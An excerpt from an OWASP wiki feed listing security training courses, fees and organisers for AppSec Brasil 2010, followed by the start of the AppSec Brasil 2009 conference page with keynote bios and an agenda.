== Utilizando a API de segurança OWASP ESAPI (Enterprise Security API) para prover segurança em aplicações Web ==&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt; Treinamento em português. &amp;lt;/span&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''Data e horário: 16 de Novembro (9 às 18 horas)'''&amp;lt;br&amp;gt; '''Instrutor: Tarcizio Vieira Neto'''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Resumo'''&lt;br /&gt;
&lt;br /&gt;
A evolução da tecnologia no desenvolvimento de aplicações WEB tem contribuído com o aumento significativo do uso dessa tecnologia para atender os mais diversificados propósitos. Porém, essa tecnologia está sujeita a vulnerabilidades de segurança críticas, principalmente quando pesquisas recentes apontam que a maioria das vulnerabilidades estão presentes na própria aplicação. A biblioteca ESAPI (Enterprise Security API), da OWASP, surge neste cenário como uma biblioteca de segurança open source disponível para diversas linguagens, como Java EE, PHP, .NET, ASP Clássico, Python, Ruby, entre outras. O minicurso abordada as vulnerabilidades causadas por erros comuns no desenvolvimento de aplicações e os mecanismos de controle de segurança providos pela biblioteca ESAPI com o foco na tecnologia Java. Os princípios &lt;br /&gt;
gerais aprendidos no curso podem ser aplicados no contexto das demais linguagens de programação.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Público Alvo'''&lt;br /&gt;
&lt;br /&gt;
O perfil desejado de audiência são pessoas ligadas à área de desenvolvimento e segurança de &lt;br /&gt;
aplicações   Web,   tendo   como   pré-requisito   conhecimentos   básicos   em   tecnologias   Web, &lt;br /&gt;
protocolos de comunicação HTTP e HTTPs, princípios básicos de segurança: criptografia, hash e assinatura digital, &lt;br /&gt;
programação Java para sistemas Web.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Objetivos de Aprendizado'''&lt;br /&gt;
&lt;br /&gt;
* Conhecer as principais vulnerabilidades de segurança comumente encontradas em aplicações Web.&lt;br /&gt;
* Apresentar a arquitetura da biblioteca ESAPI e o funcionamento de seus módulos com exemplos em código Java associados.&lt;br /&gt;
* Apresentar o componente Web Application Firewall da ESAPI.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tópicos'''&lt;br /&gt;
&lt;br /&gt;
# Introdução&lt;br /&gt;
## Mitos relacionados à segurança em Aplicações Web&lt;br /&gt;
## Projeto OWASP&lt;br /&gt;
# OWASP Top 10&lt;br /&gt;
# Biblioteca OWASP ESAPI&lt;br /&gt;
## Módulo de Validação e Codificação&lt;br /&gt;
## Módulo de Autenticação&lt;br /&gt;
## Módulo de Controle de Acesso&lt;br /&gt;
## Módulo de utilitários HTTP&lt;br /&gt;
## Módulo de tratamento de referência de acesso&lt;br /&gt;
## Módulo de Criptografia&lt;br /&gt;
## Módulo de Log&lt;br /&gt;
## Módulo de Detecção de Intrusão&lt;br /&gt;
## Integrando o módulo AppSensor com a ESAPI&lt;br /&gt;
## Utilizando Filtros&lt;br /&gt;
## Configurando a ESAPI&lt;br /&gt;
## Módulo Web Application Firewall da ESAPI&lt;br /&gt;
# Vantagens do Uso da Biblioteca ESAPI&lt;br /&gt;
# Conclusões&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''O Instrutor'''&lt;br /&gt;
&lt;br /&gt;
Tarcizio Vieira Neto é graduado em Ciência da Computação pela Universidade Federal de &lt;br /&gt;
Goiás (UFG), em Goiânia. Começou a carreira de desenvolvedor como estagiário em   um projeto de iniciação tecnológica financiado pelo CNPq na empresa Estratégia, em Goiânia. Após concluir a graduação trabalhou por seis meses na empresa Fibonacci  Soluções Ageis, na mesma cidade, no cargo de analista de desenvolvimento. Em seguida trabalhou por dois anos e oito meses na Força Aérea Brasileira como oficial &lt;br /&gt;
analista de sistemas do quadro complementar no Centro de Computação da Aeronáutica &lt;br /&gt;
de Brasília, onde adquiriu experiência com a tecnologias de certificação digital e colaborou no &lt;br /&gt;
desenvolvimento de um sistema corporativo de gestão eletrônica de documentos. &lt;br /&gt;
&lt;br /&gt;
Atualmente trabalha no SERPRO desde novembro de 2009 como Analista de Desenvolvimento, na Coordenação Estratégica de Tecnologia – CETEC, desenvolvendo trabalhos sobre o tema segurança no desenvolvimento de software, desde novembro de 2009, onde dedica-se prioritariamente na elaboração de guias que padronizam técnicas e ferramentas que dão suporte à segurança no desenvolvimento de aplicações Web. &lt;br /&gt;
Está cursando o curso de especialização em segurança da informação pela Universidade &lt;br /&gt;
de Brasília (UnB) e possui ao todo &lt;br /&gt;
mais de 5 anos de experiência com programação em Java.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==The Art and Science of Threat Modeling Web Applications==&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt; Atenção: Este treinamento será ministrado em inglês SEM tradução simultânea. &amp;lt;/span&amp;gt;''' &lt;br /&gt;
&lt;br /&gt;
'''Data e horário: 17 de Novembro (9 às 18 horas)'''&amp;lt;br&amp;gt; '''Instrutor: Mano Paul'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Resumo'''&lt;br /&gt;
&lt;br /&gt;
To secure your home, you will first need to know how the thief could possibly enter and exit and where you should store your valuables. The same is true of your web applications. Unless you know what the vulnerabilities and threats of your web applications are, and what security measures you should take to protect them, ev1L h@x0rS or the enemy within (insider) could take advantage of the vulnerabilities. &lt;br /&gt;
Threat Modeling is a technique that you can use to identify ATVS (attacks, threats, vulnerabilities and safeguards) that could affect your web applications. Threat Modeling helps in designing your application securely from a confidentiality, integrity, availability, authentication, authorization and auditing perspective. It is an essential activity to be undertaken during the design stage of your SDLC and helps mitigate and minimize overall risk. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Público Alvo'''&lt;br /&gt;
&lt;br /&gt;
O público alvo é composto por pessoal técnico e gerencial de organizações de desenvolvimento de sistemas, sem requisitos de conhecimento de linguagens ou metodologias de propogamação especificos.&lt;br /&gt;
&lt;br /&gt;
'''Objetivos de Aprendizado'''&lt;br /&gt;
&lt;br /&gt;
# Understand Threat Modeling; when to threat model and when not too&lt;br /&gt;
# Translation of threats to risks for the organization&lt;br /&gt;
# Have fun learning complex concepts with exercises and interactive games&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tópicos'''&lt;br /&gt;
&lt;br /&gt;
Introduction &lt;br /&gt;
# Why Threat Model? &lt;br /&gt;
# Is Threat Modeling Right for You? &lt;br /&gt;
# Challenges &lt;br /&gt;
# Precursors &lt;br /&gt;
# Data Classification and Threat Modeling &lt;br /&gt;
# Web Application Security Mechanisms &lt;br /&gt;
# Benefits of Threat Modeling &lt;br /&gt;
# Common Glossary of Terms &lt;br /&gt;
# Threat Agents &lt;br /&gt;
# OWASP Top 10 and common application attacks&lt;br /&gt;
# Threat Modeling Process &lt;br /&gt;
# Attack Trees &lt;br /&gt;
# Threat and Risk Frameworks e.g., STRIDE and DREAD &lt;br /&gt;
# Threat to Risk translation&lt;br /&gt;
# Threat Modeling (Hands-On Exercise)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''O Instrutor'''&lt;br /&gt;
&lt;br /&gt;
Manoranjan (Mano) Paul is the Software Assurance Advisor for (ISC)2. His information security and software assurance experience includes designing and developing security programs from compliance-to-coding, security in the SDLC, writing secure code, risk management, security strategy, and security awareness training and education. He founded and serves as the CEO &amp;amp; President of Express Certifications. He also founded SecuRisk Solutions, a company that specializes in security product development and consulting.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Segurança em Arquitetura Orientada a Serviço==&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt; Treinamento em português. &amp;lt;/span&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''Data e horário: 17 de Novembro (9 às 18 horas)'''&amp;lt;br&amp;gt; '''Instrutores: Douglas Rodrigues, Julio Cesar Estrella e Nuno Manuel dos Santos Antunes'''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
'''Resumo'''&lt;br /&gt;
&lt;br /&gt;
Web services são a pedra angular de Arquiteturas Orientadas a Serviços (SOA). Como&lt;br /&gt;
componentes críticos de negócios, Web Services devem apresentar alta segurança. No&lt;br /&gt;
entanto, a implantação de Web Services seguros é uma tarefa complexa. De fato, diversos&lt;br /&gt;
estudos mostram que um grande número de Web Services são implantados com falhas de&lt;br /&gt;
segurança que vão desde vulnerabilidades de código (por exemplo, vulnerabilidades que&lt;br /&gt;
permitem a injeção de código, incluindo SQL Injection e XPath Injection) até a utilização&lt;br /&gt;
incorreta das normas e protocolos de segurança. O objetivo desse minicurso é o de apresentar&lt;br /&gt;
de forma teórica e prática ferramentas que permitem a detecção de vulnerabilidades e&lt;br /&gt;
mecanismos e protocolos de segurança contra ataques.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Público Alvo'''&lt;br /&gt;
&lt;br /&gt;
O público alvo é composto por pessoal técnico e operacional de organizações de desenvolvimento de sistemas, com requisitos de conhecimento de linguagens ou metodologias de propogamação especificos em nível intermediário.&lt;br /&gt;
&lt;br /&gt;
'''Objetivos de Aprendizado'''&lt;br /&gt;
&lt;br /&gt;
O minicurso proposto contribui para agregar novas tendências tecnológicas. O tema é bastante&lt;br /&gt;
interessante no tocante aos grandes desafios da pesquisa em computação, uma vez que se&lt;br /&gt;
insere de forma natural dentro do desenvolvimento tecnológico de qualidade, englobando por&lt;br /&gt;
sua vez, sistemas disponíveis, corretos, seguros, escaláveis, persistentes e ubíquos, além de&lt;br /&gt;
notoriamente, observando-se as conferências da área, que SOA, Web Services e segurança&lt;br /&gt;
constituem tema de crescente investigação na área de computação, pois é atual e de interesse&lt;br /&gt;
da comunidade acadêmica, bem como de profissionais que atuam amplamente no mercado de&lt;br /&gt;
trabalho. O interesse por SOA tem crescido nos últimos anos por se tratar de uma abordagem&lt;br /&gt;
que ajuda os sistemas a permanecerem escaláveis e flexíveis enquanto crescem, e que&lt;br /&gt;
também pode auxiliar a resolver a lacuna negócio/TI. Os estudantes e profissionais da área&lt;br /&gt;
terão a oportunidade de compreender os princípios básicos de detecção de vulnerabilidade em&lt;br /&gt;
nível de código e também a detecção de ataques por meio de protocolos e mecanismos. A&lt;br /&gt;
idéia é que os participantes possam utilizar o breve conhecimento adquirido neste minicurso&lt;br /&gt;
para o desenvolvimento de aplicações distribuídas usando Web Services seguros e obterem&lt;br /&gt;
conhecimento necessário para diagnosticar e prevenir ataques a esse tipo de aplicação.&lt;br /&gt;
&lt;br /&gt;
'''Tópicos'''&lt;br /&gt;
&lt;br /&gt;
# PADRÕES E PROTOCOLOS DE SEGURANÇA PAR WEB SERVICES&lt;br /&gt;
# ATAQUES EM WEB SERVICES&lt;br /&gt;
## Ataques de Negação de Serviço (Denial of Service)&lt;br /&gt;
## Ataques de Força Bruta (Brute force)&lt;br /&gt;
## Ataques Spoofing&lt;br /&gt;
## Ataques de Inundação (Flooding)&lt;br /&gt;
## Ataques por Injeção&lt;br /&gt;
# AVALIANDO SEGURANÇA EM WEB SERVICES&lt;br /&gt;
## Estudo de campo sobre segurança em Web Services&lt;br /&gt;
## Análise “White-box”&lt;br /&gt;
## Teste “Black-box”&lt;br /&gt;
## Teste “Gray-box”&lt;br /&gt;
## Estudo de campo sobre a eficácia de ferramentas de avaliação de segurança&lt;br /&gt;
&lt;br /&gt;
'''O Instrutor'''&lt;br /&gt;
&lt;br /&gt;
Júlio Cesar Estrella - Cursou Mestrado em Ciência da Computação e Matemática&lt;br /&gt;
Computacional, na área de Sistemas Distribuídos (Instituto de Ciências Matemáticas e&lt;br /&gt;
de Computação ICMC / Universidade de São Paulo – USP). Durante o Mestrado,&lt;br /&gt;
trabalho com simulação de redes de filas em um projeto relacionado ao&lt;br /&gt;
desenvolvimento de técnicas de negociação em modelos de servidores web com&lt;br /&gt;
diferenciação de serviços. Doutor em Ciência da Computação e Matemática&lt;br /&gt;
Computacional (Instituto de Ciências Matemáticas e de Computação ICMC /&lt;br /&gt;
Universidade de São Paulo – USP). O tema do projeto de doutorado versou sobre&lt;br /&gt;
arquiteturas orientadas a serviços com suporte à QoS, bem como caracterização de&lt;br /&gt;
cargas de trabalho para Web Services e Composição de Serviços também com suporte&lt;br /&gt;
à Qualidade de Serviço. Atualmente é professor da Universidade Tecnológica Federal&lt;br /&gt;
do Paraná (UTFPR - Campo Mourão)&lt;br /&gt;
&lt;br /&gt;
Douglas Rodrigues - Mestrando em Ciências de Computação e Matemática&lt;br /&gt;
Computacional pelo Instituto de Ciências Matemáticas e de Computação da&lt;br /&gt;
Universidade de São Paulo - ICMC-USP/São Carlos. Bacharel em Ciência da&lt;br /&gt;
Computação pelo Centro Universitário Eurípides de Marília - UNIVEM - Marília/SP. Atua&lt;br /&gt;
principalmente nos seguintes temas: SOA, Web Services, avaliação de desempenho,&lt;br /&gt;
criptografia e segurança.&lt;br /&gt;
&lt;br /&gt;
Nuno Manuel dos Santos Antunes - frequentou, entre 2003 e 2007, a Licenciatura em&lt;br /&gt;
Engenharia Informática no Departamento de Engenharia Informática da Universidade de&lt;br /&gt;
Coimbra. Desde 2008 que exerce investigação científica no grupo de Software and&lt;br /&gt;
Systems Engineering (SSE) do Centro de Informática e Sistemas da Universidade de&lt;br /&gt;
Coimbra (CISUC), em tópicos relacionados com metodologias e ferramentas para o&lt;br /&gt;
desenvolvimento de Web Services sem vulnerabilidades. Concluiu em 2009 o Mestrado&lt;br /&gt;
em Engenharia Informática no Departamento de Engenharia Informática da&lt;br /&gt;
Universidade de Coimbra, com a classificação final de Muito Bom. Em 2009 iniciou o&lt;br /&gt;
seu Doutoramento em Ciências e Tecnologias da Informação. Publicou 5 artigos&lt;br /&gt;
científicos em conferências com processo de revisão pelos pares rigoroso, incluindo&lt;br /&gt;
artigos nas conferências mais prestigiadas das áreas de confiabilidade e serviços.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Revisões de Segurança de Sistemas ASP.NET nos modos &amp;quot;black box&amp;quot; e &amp;quot;white-box&amp;quot; usando a plataforma OWASP O2==&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;span style=&amp;quot;color: rgb(255, 0, 0);&amp;quot;&amp;gt; Este treinamento será ministrado em português usando materiais em inglês. &amp;lt;/span&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''Data e horário: 16 de Novembro (9 às 18 horas)'''&amp;lt;br&amp;gt; '''Instrutor: Dinis Cruz'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Resumo'''&lt;br /&gt;
&lt;br /&gt;
This is a hands-on Training course on how to use the OWASP O2 Platform to perform both Black-Box and White-Box security reviews on ASP.NET Web Applications&lt;br /&gt;
&lt;br /&gt;
The course is designed for security consultants/developers who are responsible for performing Penetration Tests or Security Code Reviews. The course will show practical examples of how to use the OWASP O2 Platform to find, exploit and document security vulnerabities.&lt;br /&gt;
&lt;br /&gt;
For the course's labs, a number of test and real-world applications/frameworks will be used. In order to give the students a benign test enviroment which is easy to replicate, the (vulnerable-by-design) HacmeBank ASP.NET banking application will be used throughout the course.&lt;br /&gt;
&lt;br /&gt;
'''Tópicos'''&lt;br /&gt;
&lt;br /&gt;
* What is the OWASP O2 Platform and how to use it?&lt;br /&gt;
* Using O2's Unit Tests for web exploration and browsing&lt;br /&gt;
* Using O2's Unit Tests for web exploitation&lt;br /&gt;
* Understanding and using O2's Web Automation Tools to find and exploit vulnerabilities in HacmeBank (Black-Box)&lt;br /&gt;
* Understanding and using O2's AST .NET Scanner to find vulnerabilities in HacmeBank (White-Box)&lt;br /&gt;
* Connecting the source-code traces with the web exploits to create a unified view of the vulnerabilties&lt;br /&gt;
* Create 'Vulnerability-driven Unit Tests' to be delivered to Developers, QA/Testers and Managers&lt;br /&gt;
* Customizing and writing new APIs (for new or modified frameworks)&lt;br /&gt;
* Using O2 to consume results from open source tools and 3rd party commercial vendors&lt;br /&gt;
* Case Study: Microsoft ASP.NET MVC&lt;br /&gt;
* Case Study: Microsoft Sharpoint&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''O Instrutor'''&lt;br /&gt;
&lt;br /&gt;
The course is delivered by Dinis Cruz who the lead developer of the OWASP O2 Platform and has created and delivered a number of .NET Security training courses&lt;br /&gt;
&lt;br /&gt;
== Local dos treinamentos ==&lt;br /&gt;
&lt;br /&gt;
A conferência será em Campinas, SP, na [http://www.cpqd.com.br Fundação CPQD]. &lt;br /&gt;
&lt;br /&gt;
Veja a localização usando o [http://maps.google.com.br/maps/ms?source=embed&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;ie=UTF8&amp;amp;update=1&amp;amp;t=h&amp;amp;msa=0&amp;amp;msid=104978801628275418750.000462bf2d1a49a7571af&amp;amp;ll=-22.83125,-47.044315&amp;amp;spn=0.03718,0.04034&amp;amp;z=14 Google Maps]&lt;br /&gt;
&lt;br /&gt;
== Como chegar ==&lt;br /&gt;
&lt;br /&gt;
TBD &lt;br /&gt;
&lt;br /&gt;
==== Venue  ====&lt;br /&gt;
&lt;br /&gt;
The event will be held in Campinas, SP, Brazil at: [http://www.cpqd.com.br Fundação CPQD]. &lt;br /&gt;
&lt;br /&gt;
You can check the location at [http://maps.google.com.br/maps/ms?source=embed&amp;amp;hl=pt-BR&amp;amp;geocode=&amp;amp;ie=UTF8&amp;amp;update=1&amp;amp;t=h&amp;amp;msa=0&amp;amp;msid=104978801628275418750.000462bf2d1a49a7571af&amp;amp;ll=-22.83125,-47.044315&amp;amp;spn=0.03718,0.04034&amp;amp;z=14 Google Maps] &lt;br /&gt;
&lt;br /&gt;
''How to get there'' &lt;br /&gt;
&lt;br /&gt;
TBD &lt;br /&gt;
&lt;br /&gt;
==== Registration  ====&lt;br /&gt;
&lt;br /&gt;
== Online Registration ==&lt;br /&gt;
&lt;br /&gt;
Registration form will be available shortly.&lt;br /&gt;
&lt;br /&gt;
== Conference Fees  ==&lt;br /&gt;
&lt;br /&gt;
'''Access to conference:'''&lt;br /&gt;
&lt;br /&gt;
* Before Sep 16th:  400.00 BRL&lt;br /&gt;
* Before Oct 16th:  500.00 BRL&lt;br /&gt;
* Before Nov 12th:  550.00 BRL&lt;br /&gt;
* On site:                  600.00 BRL&lt;br /&gt;
&lt;br /&gt;
On site registration subject to the availability of seats.&lt;br /&gt;
&lt;br /&gt;
'''Trainings'''&lt;br /&gt;
&lt;br /&gt;
* One day:    450.00 BRL&lt;br /&gt;
* Two days:  900.00 BRL&lt;br /&gt;
&lt;br /&gt;
'''Discounts'''&lt;br /&gt;
&lt;br /&gt;
* OWASP Member:  100.00 BRL (Note: This discount is greater than the OWASP USD 50.00 annual fee. Check [http://www.google.com.br/#q=50+usd+in+brl&amp;amp;fp=1  here]&lt;br /&gt;
* Student:                 100.00 BRL (Note: student ID required).&lt;br /&gt;
&lt;br /&gt;
==== Committees  ====&lt;br /&gt;
&lt;br /&gt;
== Conference Committee ==&lt;br /&gt;
&lt;br /&gt;
OWASP Global Conferences Committee Chair: Mark Bristow &lt;br /&gt;
&lt;br /&gt;
OWASP [[Brazilian]] Chapter Leader: Wagner Elias &lt;br /&gt;
&lt;br /&gt;
AppSec Brasil 2010 Organization Team (organizacao2010 at appsecbrasil.org): &lt;br /&gt;
&lt;br /&gt;
*Conference General Chair: Lucas C. Ferreira &lt;br /&gt;
*Tutorials Chair: Eduardo Camargo Neves &lt;br /&gt;
*Tracks Chair: Luiz Otávio Duarte &lt;br /&gt;
*Local Chair: Alexandre Melo Braga&lt;br /&gt;
&lt;br /&gt;
=== Team Members  ===&lt;br /&gt;
&lt;br /&gt;
*Alexandre Melo Braga &lt;br /&gt;
*Eduardo Camargo Neves &lt;br /&gt;
*Lucas C. Ferreira &lt;br /&gt;
*Luiz Otávio Duarte &lt;br /&gt;
*Wagner Elias &lt;br /&gt;
*Eduardo Alves Nonato da Silva &lt;br /&gt;
*Leonardo Buonsanti &lt;br /&gt;
*Dinis Cruz &lt;br /&gt;
*Paulo Coimbra&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Programme Committee:==&lt;br /&gt;
* Alexandre Braga&lt;br /&gt;
* Carlos Serrao&lt;br /&gt;
* Eduardo alves&lt;br /&gt;
* Fernando Cima&lt;br /&gt;
* Leonardo Buonsanti&lt;br /&gt;
* Lucas Ferreira&lt;br /&gt;
* Luiz Duarte&lt;br /&gt;
* Nelson Uto&lt;br /&gt;
* Rodrigo Rubira&lt;br /&gt;
* Wagner Elias&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
==== Travel ====&lt;br /&gt;
&lt;br /&gt;
TBD &lt;br /&gt;
&lt;br /&gt;
==== Links ====&lt;br /&gt;
&lt;br /&gt;
Blog: http://blog.appsecbrasil.org &lt;br /&gt;
&lt;br /&gt;
Twitter: http://twitter.com/owaspappsecbr &lt;br /&gt;
&lt;br /&gt;
Banner: http://www.owasp.org/images/3/31/AppSec_Brasil_2010_Banner.gif&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_AppSec_Conference]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=68007</id>
		<title>AppSec Brasil 2009 (pt-br)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=AppSec_Brasil_2009_(pt-br)&amp;diff=68007"/>
				<updated>2009-08-25T17:20:17Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: Correção de erro ortográfico&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Conferência Internacional de Segurança de Aplicações (AppSec Brasil 2009)=&lt;br /&gt;
&lt;br /&gt;
A comunidade [http://www.ticontrole.gov.br Comunidade TI-Controle] e o Centro de Informática da [http://www.camara.gov.br Câmara dos Deputados] apresentam a '''Conferência Internacional de Segurança de Aplicações''', que será realizada com o apoio do OWASP ([http://www.owasp.org/index.php/About_OWASP Open Web Application Security Project]) em [http://en.wikipedia.org/wiki/Brasília Brasília], capital do Brasil. A conferência consistirá de dois dias de treinamentos, seguidos de dois dias de plenárias em trilha única.&lt;br /&gt;
&lt;br /&gt;
[[Image:Brasilia Panorama.jpg]]&lt;br /&gt;
&lt;br /&gt;
==Datas==&lt;br /&gt;
&lt;br /&gt;
A Conferência ocorrerá do dia 27 ao 30 de outubro de 2009. Os dias 27 e 28 de outubro serão dedicados ao mini-cursos e os dias 29 e 30 terão as sessões plenárias.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;'''&amp;lt;span style=&amp;quot;color:#ff0000&amp;quot;&amp;gt; Aviso aos Autores de propostas de palestras e mini-cursos: &amp;lt;/span&amp;gt;'''&amp;lt;/center&amp;gt;&lt;br /&gt;
A seleção das propostas já foi encerrada. Os autores das propostas selecionadas foram avisados e têm um prazo para confirmar a participação no evento. As demais propostas estão em uma 'fila de espera'. &lt;br /&gt;
&lt;br /&gt;
Caso alguma proposta não seja confirmada, chamaremos os demais autores na ordem da fila de espera. Notificaremos os autores que não forem escolhidos assim que a grade de palestras e mini-cursos for concluída.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Promoção====&lt;br /&gt;
&lt;br /&gt;
Esta conferência é promovida pela Comunidade [http://www.ticontrole.gov.br TI-Controle] e organizada pelo Centro de Informática da [http://www.camara.gov.br/ Câmara dos Deputados].&lt;br /&gt;
&lt;br /&gt;
A Conferência tem o apoio do OWASP, [[Brazilian | Capítulo Brasil]], como provedor de conteúdo (seleção de palestras e cursos e montagem da grade de horários).&lt;br /&gt;
&lt;br /&gt;
====Keynotes====&lt;br /&gt;
'''Gary McGraw'''&lt;br /&gt;
&lt;br /&gt;
CTO, [http://www.cigital.com Cigital]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Image:GaryMcGraw.JPG|left|60px]]&lt;br /&gt;
&lt;br /&gt;
''Título:'' '''The Building Security In Maturity Model (BSIMM)'''&lt;br /&gt;
&lt;br /&gt;
''Biografia:''&lt;br /&gt;
Gary McGraw é o CTO da Cigital, Inc., uma empresa de segurança e qualidade de software com sede em Washington, Estados Unidos. Ele é reconhecido mundialmente como uma autoridade em segurança de software e é autor de oito importantes livros sobre este tópico, incluindo: &amp;quot;Java Security&amp;quot;, &amp;quot;Building Secure Software&amp;quot;, &amp;quot;Exploiting software&amp;quot;, &amp;quot;Software Security&amp;quot; e &amp;quot;Exploiting Online Games&amp;quot;. Ele é também editor da série de livros sobre segurança de software na editora Addison-Wesley. Dr. McGraw também escreveu mais de 100 artigos científicos, escreve uma coluna mensal para o site informIT e é frequentemente citado na mídia. Além de servir como consultor estratégico para importantes empresas e executivos de TI, Gary faz parte dos Conselhos Administrativos das empresas Fortify Software e Raven White. Ele recebeu um PhD duplo em Ciência Cognitiva e Ciência da Computação pela Universidade de Indiana, onde ele faz parte do Conselho Consultivo da Escola de Informática. Ele também produz o podcast &amp;quot;Silver Bullet&amp;quot; para a revista IEEE Security &amp;amp; Privacy e produz o podcast Reality Check Security para o site CSO online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Jason Li'''&lt;br /&gt;
&lt;br /&gt;
[http://www.aspectsecurity.com Aspect Security]&lt;br /&gt;
&lt;br /&gt;
''Título:'' '''Agile and Secure: Can We Do Both?'''&lt;br /&gt;
&lt;br /&gt;
Co-autor: '''Jerry Hoff''', Aspect Security&lt;br /&gt;
&lt;br /&gt;
''Biografias:''&lt;br /&gt;
Jason Li é engenheiro senior de segurança de aplicações na Aspect Security. Jason conduz revisões de arquiteturas de segurança, revisão de segurança em código de aplicações, testes de segurança e provê treinamentos de segurança em aplicações Web para diversas empresas do ramo de varejo, financeiro e governamentais. Ele também é ativamente envolvido na OWASP, apoiando do Comitê de Projetos Globais da OWASP e como co-autor do Projeto Antisamy da OWASP (versão Java). Jason obteve seu pós-mestrado em Ciências da Computação com concentração em Segurança da Informação pela Universidade Johns Hopkins. Ele obteve seu grau de Mestre em Ciências da Computação pela Universidade Cornell, onde obteve também sua graduação dupla, em Ciências da COmputação e Pesquisador de Operações.&lt;br /&gt;
&lt;br /&gt;
Jerry Hoff é engenheiro senior de segurança de aplicações na Aspect Security. Jerry coordena e executa numerosas revisões de segurança em código de aplicações para clientes de diversas industrias. Jerry também fornece treinamentos para clientes e possui mais de 10 anos de experiência ensinando e desenvolvendo. Jerry também é envolvido com a OWASP e foi o líder do projeto AntiSamy .net. Ele possui mestrado em Ciências da Computação pela Universidade de Washington em St. Louis.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Dinis Cruz'''&lt;br /&gt;
&lt;br /&gt;
OWASP Board&lt;br /&gt;
&lt;br /&gt;
''Título:'' '''A Definir'''&lt;br /&gt;
&lt;br /&gt;
''Biografia:''&lt;br /&gt;
&lt;br /&gt;
A definir.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Kuai Hinojosa'''&lt;br /&gt;
&lt;br /&gt;
OWASP&lt;br /&gt;
&lt;br /&gt;
''Título:'' '''Deploying Secure Web Applications with OWASP Resources'''&lt;br /&gt;
&lt;br /&gt;
''Biografia:''&lt;br /&gt;
&lt;br /&gt;
Kuai Hinojosa desenvolve e protege aplicações Web por mais de 12 anos. Anteriormente, ele trabalhou no setor bancário como administrador de segurança de base de dados para o quinto maior banco dos Estados Unidos, onde ele trabalhou em um pequeno time de desenvolvimento de aplicações para proteção dos ativos da empresa. Ele trabalha agora na Universidade de Nova Yorque como Especialista de Aplicações Web onde ele continua a empregar o desenvolvimento de aplicações Web e a experiência em segurança de aplicações para proteger os recursos da universidade. Em seu tempo livre, Kuai se voluntaria para catequisar sermões de segurança de aplicações and liderar o capítulo de Mineapolis da OWASP. Kuai é membro do Comitê Global de Edução da OWASP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Agenda ====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span style=&amp;quot;color:red;font-style:italic;font-weight:bold;font-size: 120%;&amp;quot;&amp;gt;&amp;lt;center&amp;gt;Esta agenda é preliminar e sujeita a mudanças&amp;lt;/center&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Programa da Conferência - Dia 1 - 29 de outubro de 2009 '''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table width=&amp;quot;80%&amp;quot; class=&amp;quot;t&amp;quot;&amp;gt;&lt;br /&gt;
		&amp;lt;tr&amp;gt;&lt;br /&gt;
			&amp;lt;td width=&amp;quot;14%&amp;quot; class=&amp;quot;tcell3&amp;quot; valign=&amp;quot;center&amp;quot;&amp;gt;&amp;lt;div align=&amp;quot;right&amp;quot;&amp;gt;08:30 - 09:00&amp;lt;/div&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
			&amp;lt;td colspan=&amp;quot;2&amp;quot; bgcolor=&amp;quot;#8595C2&amp;quot; class=&amp;quot;tcell3&amp;quot;&amp;gt;&amp;lt;center&amp;gt;&lt;br /&gt;
			  &amp;lt;strong&amp;gt;			  Recepção			  &amp;lt;/strong&amp;gt;&lt;br /&gt;
